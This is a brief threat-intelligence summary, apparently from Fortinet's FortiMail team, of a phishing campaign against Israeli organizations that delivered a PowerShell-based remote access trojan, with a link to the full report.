The Fortinet/FortiMail Workspace Security team recently identified a targeted intrusion campaign impacting multiple Israeli organizations. The adversary leveraged compromised internal email infrastructure to distribute phishing messages across the regional business landscape. These emails initiated a multi-stage, PowerShell-based infection chain that culminated in the delivery of a remote access trojan (RAT), executed entirely through PowerShell.
Key characteristics include:
- Full PowerShell-based delivery chain requiring no external executables
- Obfuscated payloads retrieved from actor-controlled infrastructure
- Evidence of lateral movement and surveillance activity
- Potential overlap with MuddyWater campaigns, but attribution remains inconclusive
The following report outlines technical observations from the campaign, including delivery tactics, obfuscation methods, C2 activity, and MITRE ATT&CK mappings.
Link to full report: IR-25-224-001_Phishing Msgs.pdf
Comments